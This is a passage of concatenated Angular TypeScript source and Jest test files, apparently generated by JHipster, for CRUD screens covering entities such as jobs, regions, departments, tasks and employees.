protected jobService: JobMySuffixService,
protected taskService: TaskMySuffixService,
protected employeeService: EmployeeMySuffixService,
protected activatedRoute: ActivatedRoute,
protected fb: FormBuilder
) {}
ngOnInit(): void {
this.activatedRoute.data.subscribe(({ job }) => {
this.updateForm(job);
this.loadRelationshipsOptions();
});
}
previousState(): void {
window.history.back();
}
save(): void {
this.isSaving = true;
const job = this.createFromForm();
if (job.id !== undefined) {
this.subscribeToSaveResponse(this.jobService.update(job));
} else {
this.subscribeToSaveResponse(this.jobService.create(job));
}
}
trackTaskMySuffixById(index: number, item: ITaskMySuffix): string {
return item.id!;
}
trackEmployeeMySuffixById(index: number, item: IEmployeeMySuffix): string {
return item.id!;
}
getSelectedTaskMySuffix(option: ITaskMySuffix, selectedVals?: ITaskMySuffix[]): ITaskMySuffix {
if (selectedVals) {
for (const selectedVal of selectedVals) {
if (option.id === selectedVal.id) {
return selectedVal;
}
}
}
return option;
}
protected subscribeToSaveResponse(result: Observable<HttpResponse<IJobMySuffix>>): void {
result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
() => this.onSaveSuccess(),
() => this.onSaveError()
);
}
protected onSaveSuccess(): void {
this.previousState();
}
protected onSaveError(): void {
// Api for inheritance.
}
protected onSaveFinalize(): void {
this.isSaving = false;
}
protected updateForm(job: IJobMySuffix): void {
this.editForm.patchValue({
id: job.id,
jobTitle: job.jobTitle,
minSalary: job.minSalary,
maxSalary: job.maxSalary,
tasks: job.tasks,
employee: job.employee,
});
this.tasksSharedCollection = this.taskService.addTaskMySuffixToCollectionIfMissing(this.tasksSharedCollection, ...(job.tasks ?? []));
this.employeesSharedCollection = this.employeeService.addEmployeeMySuffixToCollectionIfMissing(
this.employeesSharedCollection,
job.employee
);
}
protected loadRelationshipsOptions(): void {
this.taskService
.query()
.pipe(map((res: HttpResponse<ITaskMySuffix[]>) => res.body ?? []))
.pipe(
map((tasks: ITaskMySuffix[]) =>
this.taskService.addTaskMySuffixToCollectionIfMissing(tasks, ...(this.editForm.get('tasks')!.value ?? []))
)
)
.subscribe((tasks: ITaskMySuffix[]) => (this.tasksSharedCollection = tasks));
this.employeeService
.query()
.pipe(map((res: HttpResponse<IEmployeeMySuffix[]>) => res.body ?? []))
.pipe(
map((employees: IEmployeeMySuffix[]) =>
this.employeeService.addEmployeeMySuffixToCollectionIfMissing(employees, this.editForm.get('employee')!.value)
)
)
.subscribe((employees: IEmployeeMySuffix[]) => (this.employeesSharedCollection = employees));
}
protected createFromForm(): IJobMySuffix {
return {
...new JobMySuffix(),
id: this.editForm.get(['id'])!.value,
jobTitle: this.editForm.get(['jobTitle'])!.value,
minSalary: this.editForm.get(['minSalary'])!.value,
maxSalary: this.editForm.get(['maxSalary'])!.value,
tasks: this.editForm.get(['tasks'])!.value,
employee: this.editForm.get(['employee'])!.value,
};
}
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { CountryMySuffixComponent } from '../list/country-my-suffix.component';
import { CountryMySuffixDetailComponent } from '../detail/country-my-suffix-detail.component';
import { CountryMySuffixUpdateComponent } from '../update/country-my-suffix-update.component';
import { CountryMySuffixRoutingResolveService } from './country-my-suffix-routing-resolve.service';
const countryRoute: Routes = [
{
path: '',
component: CountryMySuffixComponent,
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: CountryMySuffixDetailComponent,
resolve: {
country: CountryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: CountryMySuffixUpdateComponent,
resolve: {
country: CountryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: CountryMySuffixUpdateComponent,
resolve: {
country: CountryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(countryRoute)],
exports: [RouterModule],
})
export class CountryMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { IRegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { RegionMySuffixDeleteDialogComponent } from '../delete/region-my-suffix-delete-dialog.component';
@Component({
selector: 'jhi-region-my-suffix',
templateUrl: './region-my-suffix.component.html',
})
export class RegionMySuffixComponent implements OnInit {
regions?: IRegionMySuffix[];
isLoading = false;
constructor(protected regionService: RegionMySuffixService, protected modalService: NgbModal) {}
loadAll(): void {
this.isLoading = true;
this.regionService.query().subscribe(
(res: HttpResponse<IRegionMySuffix[]>) => {
this.isLoading = false;
this.regions = res.body ?? [];
},
() => {
this.isLoading = false;
}
);
}
ngOnInit(): void {
this.loadAll();
}
trackId(index: number, item: IRegionMySuffix): string {
return item.id!;
}
delete(region: IRegionMySuffix): void {
const modalRef = this.modalService.open(RegionMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
modalRef.componentInstance.region = region;
// unsubscribe not needed because closed completes on modal close
modalRef.closed.subscribe(reason => {
if (reason === 'deleted') {
this.loadAll();
}
});
}
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IRegionMySuffix, getRegionMySuffixIdentifier } from '../region-my-suffix.model';
export type EntityResponseType = HttpResponse<IRegionMySuffix>;
export type EntityArrayResponseType = HttpResponse<IRegionMySuffix[]>;
@Injectable({ providedIn: 'root' })
export class RegionMySuffixService {
public resourceUrl = this.applicationConfigService.getEndpointFor('api/regions');
constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}
create(region: IRegionMySuffix): Observable<EntityResponseType> {
return this.http.post<IRegionMySuffix>(this.resourceUrl, region, { observe: 'response' });
}
update(region: IRegionMySuffix): Observable<EntityResponseType> {
return this.http.put<IRegionMySuffix>(`${this.resourceUrl}/${getRegionMySuffixIdentifier(region) as string}`, region, {
observe: 'response',
});
}
partialUpdate(region: IRegionMySuffix): Observable<EntityResponseType> {
return this.http.patch<IRegionMySuffix>(`${this.resourceUrl}/${getRegionMySuffixIdentifier(region) as string}`, region, {
observe: 'response',
});
}
find(id: string): Observable<EntityResponseType> {
return this.http.get<IRegionMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
query(req?: any): Observable<EntityArrayResponseType> {
const options = createRequestOption(req);
return this.http.get<IRegionMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' });
}
delete(id: string): Observable<HttpResponse<{}>> {
return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
addRegionMySuffixToCollectionIfMissing(
regionCollection: IRegionMySuffix[],
...regionsToCheck: (IRegionMySuffix | null | undefined)[]
): IRegionMySuffix[] {
const regions: IRegionMySuffix[] = regionsToCheck.filter(isPresent);
if (regions.length > 0) {
const regionCollectionIdentifiers = regionCollection.map(regionItem => getRegionMySuffixIdentifier(regionItem)!);
const regionsToAdd = regions.filter(regionItem => {
const regionIdentifier = getRegionMySuffixIdentifier(regionItem);
if (regionIdentifier == null || regionCollectionIdentifiers.includes(regionIdentifier)) {
return false;
}
regionCollectionIdentifiers.push(regionIdentifier);
return true;
});
return [...regionsToAdd, ...regionCollection];
}
return regionCollection;
}
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { JobMySuffixService } from '../service/job-my-suffix.service';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { ITaskMySuffix } from 'app/entities/task-my-suffix/task-my-suffix.model';
import { TaskMySuffixService } from 'app/entities/task-my-suffix/service/task-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
import { JobMySuffixUpdateComponent } from './job-my-suffix-update.component';
describe('Component Tests', () => {
describe('JobMySuffix Management Update Component', () => {
let comp: JobMySuffixUpdateComponent;
let fixture: ComponentFixture<JobMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let jobService: JobMySuffixService;
let taskService: TaskMySuffixService;
let employeeService: EmployeeMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [JobMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(JobMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(JobMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
jobService = TestBed.inject(JobMySuffixService);
taskService = TestBed.inject(TaskMySuffixService);
employeeService = TestBed.inject(EmployeeMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should call TaskMySuffix query and add missing value', () => {
const job: IJobMySuffix = { id: 'CBA' };
const tasks: ITaskMySuffix[] = [{ id: '<NAME>' }];
job.tasks = tasks;
const taskCollection: ITaskMySuffix[] = [{ id: 'payment Grocery Baby' }];
spyOn(taskService, 'query').and.returnValue(of(new HttpResponse({ body: taskCollection })));
const additionalTaskMySuffixes = [...tasks];
const expectedCollection: ITaskMySuffix[] = [...additionalTaskMySuffixes, ...taskCollection];
spyOn(taskService, 'addTaskMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ job });
comp.ngOnInit();
expect(taskService.query).toHaveBeenCalled();
expect(taskService.addTaskMySuffixToCollectionIfMissing).toHaveBeenCalledWith(taskCollection, ...additionalTaskMySuffixes);
expect(comp.tasksSharedCollection).toEqual(expectedCollection);
});
it('Should call EmployeeMySuffix query and add missing value', () => {
const job: IJobMySuffix = { id: 'CBA' };
const employee: IEmployeeMySuffix = { id: 'maximized' };
job.employee = employee;
const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Sleek' }];
spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
const additionalEmployeeMySuffixes = [employee];
const expectedCollection: IEmployeeMySuffix[] = [...additionalEmployeeMySuffixes, ...employeeCollection];
spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ job });
comp.ngOnInit();
expect(employeeService.query).toHaveBeenCalled();
expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
employeeCollection,
...additionalEmployeeMySuffixes
);
expect(comp.employeesSharedCollection).toEqual(expectedCollection);
});
it('Should update editForm', () => {
const job: IJobMySuffix = { id: 'CBA' };
const tasks: ITaskMySuffix = { id: 'morph South' };
job.tasks = [tasks];
const employee: IEmployeeMySuffix = { id: 'alarm Switchable dot-com' };
job.employee = employee;
activatedRoute.data = of({ job });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(job));
expect(comp.tasksSharedCollection).toContain(tasks);
expect(comp.employeesSharedCollection).toContain(employee);
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const job = { id: 'ABC' };
spyOn(jobService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ job });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: job }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(jobService.update).toHaveBeenCalledWith(job);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const job = new JobMySuffix();
spyOn(jobService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ job });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: job }));
saveSubject.complete();
// THEN
expect(jobService.create).toHaveBeenCalledWith(job);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const job = { id: 'ABC' };
spyOn(jobService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ job });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(jobService.update).toHaveBeenCalledWith(job);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
describe('Tracking relationships identifiers', () => {
describe('trackTaskMySuffixById', () => {
it('Should return tracked TaskMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackTaskMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
describe('trackEmployeeMySuffixById', () => {
it('Should return tracked EmployeeMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackEmployeeMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
});
describe('Getting selected relationships', () => {
describe('getSelectedTaskMySuffix', () => {
it('Should return option if no TaskMySuffix is selected', () => {
const option = { id: 'ABC' };
const result = comp.getSelectedTaskMySuffix(option);
expect(result === option).toEqual(true);
});
it('Should return selected TaskMySuffix for according option', () => {
const option = { id: 'ABC' };
const selected = { id: 'ABC' };
const selected2 = { id: 'CBA' };
const result = comp.getSelectedTaskMySuffix(option, [selected2, selected]);
expect(result === selected).toEqual(true);
expect(result === selected2).toEqual(false);
expect(result === option).toEqual(false);
});
it('Should return option if this TaskMySuffix is not selected', () => {
const option = { id: 'ABC' };
const selected = { id: 'CBA' };
const result = comp.getSelectedTaskMySuffix(option, [selected]);
expect(result === option).toEqual(true);
expect(result === selected).toEqual(false);
});
});
});
});
});
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { LocationMySuffixComponent } from './list/location-my-suffix.component';
import { LocationMySuffixDetailComponent } from './detail/location-my-suffix-detail.component';
import { LocationMySuffixUpdateComponent } from './update/location-my-suffix-update.component';
import { LocationMySuffixDeleteDialogComponent } from './delete/location-my-suffix-delete-dialog.component';
import { LocationMySuffixRoutingModule } from './route/location-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, LocationMySuffixRoutingModule],
declarations: [
LocationMySuffixComponent,
LocationMySuffixDetailComponent,
LocationMySuffixUpdateComponent,
LocationMySuffixDeleteDialogComponent,
],
entryComponents: [LocationMySuffixDeleteDialogComponent],
})
export class LocationMySuffixModule {}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule } from '@angular/router';
@NgModule({
imports: [
RouterModule.forChild([
{
path: 'region-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.region.home.title' },
loadChildren: () => import('./region-my-suffix/region-my-suffix.module').then(m => m.RegionMySuffixModule),
},
{
path: 'country-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.country.home.title' },
loadChildren: () => import('./country-my-suffix/country-my-suffix.module').then(m => m.CountryMySuffixModule),
},
{
path: 'location-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.location.home.title' },
loadChildren: () => import('./location-my-suffix/location-my-suffix.module').then(m => m.LocationMySuffixModule),
},
{
path: 'department-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.department.home.title' },
loadChildren: () => import('./department-my-suffix/department-my-suffix.module').then(m => m.DepartmentMySuffixModule),
},
{
path: 'task-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.task.home.title' },
loadChildren: () => import('./task-my-suffix/task-my-suffix.module').then(m => m.TaskMySuffixModule),
},
{
path: 'employee-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.employee.home.title' },
loadChildren: () => import('./employee-my-suffix/employee-my-suffix.module').then(m => m.EmployeeMySuffixModule),
},
{
path: 'job-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.job.home.title' },
loadChildren: () => import('./job-my-suffix/job-my-suffix.module').then(m => m.JobMySuffixModule),
},
{
path: 'job-history-my-suffix',
data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.jobHistory.home.title' },
loadChildren: () => import('./job-history-my-suffix/job-history-my-suffix.module').then(m => m.JobHistoryMySuffixModule),
},
/* jhipster-needle-add-entity-route - JHipster will add entity modules routes here */
]),
],
})
export class EntityRoutingModule {}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { RegionMySuffixComponent } from './list/region-my-suffix.component';
import { RegionMySuffixDetailComponent } from './detail/region-my-suffix-detail.component';
import { RegionMySuffixUpdateComponent } from './update/region-my-suffix-update.component';
import { RegionMySuffixDeleteDialogComponent } from './delete/region-my-suffix-delete-dialog.component';
import { RegionMySuffixRoutingModule } from './route/region-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, RegionMySuffixRoutingModule],
declarations: [
RegionMySuffixComponent,
RegionMySuffixDetailComponent,
RegionMySuffixUpdateComponent,
RegionMySuffixDeleteDialogComponent,
],
entryComponents: [RegionMySuffixDeleteDialogComponent],
})
export class RegionMySuffixModule {}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixUpdateComponent } from './region-my-suffix-update.component';
describe('Component Tests', () => {
describe('RegionMySuffix Management Update Component', () => {
let comp: RegionMySuffixUpdateComponent;
let fixture: ComponentFixture<RegionMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let regionService: RegionMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [RegionMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(RegionMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(RegionMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
regionService = TestBed.inject(RegionMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should update editForm', () => {
const region: IRegionMySuffix = { id: 'CBA' };
activatedRoute.data = of({ region });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(region));
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const region = { id: 'ABC' };
spyOn(regionService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ region });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: region }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(regionService.update).toHaveBeenCalledWith(region);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const region = new RegionMySuffix();
spyOn(regionService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ region });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: region }));
saveSubject.complete();
// THEN
expect(regionService.create).toHaveBeenCalledWith(region);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const region = { id: 'ABC' };
spyOn(regionService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ region });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(regionService.update).toHaveBeenCalledWith(region);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
});
});
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { LocationMySuffixService } from 'app/entities/location-my-suffix/service/location-my-suffix.service';
import { DepartmentMySuffixUpdateComponent } from './department-my-suffix-update.component';
describe('Component Tests', () => {
describe('DepartmentMySuffix Management Update Component', () => {
let comp: DepartmentMySuffixUpdateComponent;
let fixture: ComponentFixture<DepartmentMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let departmentService: DepartmentMySuffixService;
let locationService: LocationMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [DepartmentMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(DepartmentMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(DepartmentMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
departmentService = TestBed.inject(DepartmentMySuffixService);
locationService = TestBed.inject(LocationMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should call location query and add missing value', () => {
const department: IDepartmentMySuffix = { id: 'CBA' };
const location: ILocationMySuffix = { id: 'algorithm magnetic' };
department.location = location;
const locationCollection: ILocationMySuffix[] = [{ id: 'Soft Colombia' }];
spyOn(locationService, 'query').and.returnValue(of(new HttpResponse({ body: locationCollection })));
const expectedCollection: ILocationMySuffix[] = [location, ...locationCollection];
spyOn(locationService, 'addLocationMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ department });
comp.ngOnInit();
expect(locationService.query).toHaveBeenCalled();
expect(locationService.addLocationMySuffixToCollectionIfMissing).toHaveBeenCalledWith(locationCollection, location);
expect(comp.locationsCollection).toEqual(expectedCollection);
});
it('Should update editForm', () => {
const department: IDepartmentMySuffix = { id: 'CBA' };
const location: ILocationMySuffix = { id: 'installation International generating' };
department.location = location;
activatedRoute.data = of({ department });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(department));
expect(comp.locationsCollection).toContain(location);
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const department = { id: 'ABC' };
spyOn(departmentService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ department });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: department }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(departmentService.update).toHaveBeenCalledWith(department);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const department = new DepartmentMySuffix();
spyOn(departmentService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ department });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: department }));
saveSubject.complete();
// THEN
expect(departmentService.create).toHaveBeenCalledWith(department);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const department = { id: 'ABC' };
spyOn(departmentService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ department });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(departmentService.update).toHaveBeenCalledWith(department);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
describe('Tracking relationships identifiers', () => {
describe('trackLocationMySuffixById', () => {
it('Should return tracked LocationMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackLocationMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
});
});
});
<file_sep>import { ComponentFixture, TestBed } from '@angular/core/testing';
import { ActivatedRoute } from '@angular/router';
import { of } from 'rxjs';
import { RegionMySuffixDetailComponent } from './region-my-suffix-detail.component';
describe('Component Tests', () => {
describe('RegionMySuffix Management Detail Component', () => {
let comp: RegionMySuffixDetailComponent;
let fixture: ComponentFixture<RegionMySuffixDetailComponent>;
beforeEach(() => {
TestBed.configureTestingModule({
declarations: [RegionMySuffixDetailComponent],
providers: [
{
provide: ActivatedRoute,
useValue: { data: of({ region: { id: 'ABC' } }) },
},
],
})
.overrideTemplate(RegionMySuffixDetailComponent, '')
.compileComponents();
fixture = TestBed.createComponent(RegionMySuffixDetailComponent);
comp = fixture.componentInstance;
});
describe('OnInit', () => {
it('Should load region on init', () => {
// WHEN
comp.ngOnInit();
// THEN
expect(comp.region).toEqual(jasmine.objectContaining({ id: 'ABC' }));
});
});
});
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IRegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
@Component({
templateUrl: './region-my-suffix-delete-dialog.component.html',
})
export class RegionMySuffixDeleteDialogComponent {
region?: IRegionMySuffix;
constructor(protected regionService: RegionMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.regionService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
@Injectable({ providedIn: 'root' })
export class RegionMySuffixRoutingResolveService implements Resolve<IRegionMySuffix> {
constructor(protected service: RegionMySuffixService, protected router: Router) {}
resolve(route: ActivatedRouteSnapshot): Observable<IRegionMySuffix> | Observable<never> {
const id = route.params['id'];
if (id) {
return this.service.find(id).pipe(
mergeMap((region: HttpResponse<RegionMySuffix>) => {
if (region.body) {
return of(region.body);
} else {
this.router.navigate(['404']);
return EMPTY;
}
})
);
}
return of(new RegionMySuffix());
}
}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IJobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
@Component({
templateUrl: './job-history-my-suffix-delete-dialog.component.html',
})
export class JobHistoryMySuffixDeleteDialogComponent {
jobHistory?: IJobHistoryMySuffix;
constructor(protected jobHistoryService: JobHistoryMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.jobHistoryService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { ITaskMySuffix } from '../task-my-suffix.model';
import { TaskMySuffixService } from '../service/task-my-suffix.service';
import { TaskMySuffixDeleteDialogComponent } from '../delete/task-my-suffix-delete-dialog.component';
@Component({
selector: 'jhi-task-my-suffix',
templateUrl: './task-my-suffix.component.html',
})
export class TaskMySuffixComponent implements OnInit {
tasks?: ITaskMySuffix[];
isLoading = false;
constructor(protected taskService: TaskMySuffixService, protected modalService: NgbModal) {}
loadAll(): void {
this.isLoading = true;
this.taskService.query().subscribe(
(res: HttpResponse<ITaskMySuffix[]>) => {
this.isLoading = false;
this.tasks = res.body ?? [];
},
() => {
this.isLoading = false;
}
);
}
ngOnInit(): void {
this.loadAll();
}
trackId(index: number, item: ITaskMySuffix): string {
return item.id!;
}
delete(task: ITaskMySuffix): void {
const modalRef = this.modalService.open(TaskMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
modalRef.componentInstance.task = task;
// unsubscribe not needed because closed completes on modal close
modalRef.closed.subscribe(reason => {
if (reason === 'deleted') {
this.loadAll();
}
});
}
}
<file_sep>export interface IRegionMySuffix {
id?: string;
regionName?: string | null;
}
export class RegionMySuffix implements IRegionMySuffix {
constructor(public id?: string, public regionName?: string | null) {}
}
export function getRegionMySuffixIdentifier(region: IRegionMySuffix): string | undefined {
return region.id;
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { EmployeeMySuffixComponent } from '../list/employee-my-suffix.component';
import { EmployeeMySuffixDetailComponent } from '../detail/employee-my-suffix-detail.component';
import { EmployeeMySuffixUpdateComponent } from '../update/employee-my-suffix-update.component';
import { EmployeeMySuffixRoutingResolveService } from './employee-my-suffix-routing-resolve.service';
const employeeRoute: Routes = [
{
path: '',
component: EmployeeMySuffixComponent,
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: EmployeeMySuffixDetailComponent,
resolve: {
employee: EmployeeMySuffixRoutingResolveService,
},
